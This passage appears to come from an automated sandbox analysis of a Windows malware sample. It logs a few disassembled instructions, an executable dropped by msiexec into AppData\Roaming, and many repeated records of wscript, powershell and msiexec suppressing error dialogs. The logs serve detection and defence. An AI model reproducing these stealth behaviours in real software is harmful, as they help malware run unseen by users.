                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F3DF9 push esp; iretd 3_2_095F3DFC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F259D pushfd ; iretd 3_2_095F25A1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F0DAD push cs; iretd 3_2_095F0DBC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F4C2E push es; retf 3_2_095F4C40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F248B push edx; ret 3_2_095F24CF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F4F26 pushfd ; retf 3_2_095F4F44
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F57A7 push ss; retf 3_2_095F57A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_095F1ED2 pushfd ; retf 3_2_095F1ED3
                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
